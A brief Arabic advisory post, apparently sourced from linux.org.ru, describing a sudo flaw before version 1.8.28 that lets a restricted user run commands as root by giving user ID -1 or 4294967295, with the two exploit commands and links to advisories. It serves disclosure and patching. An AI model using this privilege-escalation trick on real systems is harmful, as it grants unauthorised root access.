يسمح خطأ في sudo بتنفيذ أي ملف قابل للتنفيذ كجذر إذا كان / etc / sudoers يسمح بتنفيذه كمستخدمين آخرين ويحظر على الجذر.
استغلال الخطأ بسيط للغاية:
sudo -u # -1 id -u
أو:
sudo -u # 4294967295 id -u
الخطأ موجود في جميع إصدارات sudo قبل 1.8.28
تفاصيل:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
المصدر: linux.org.ru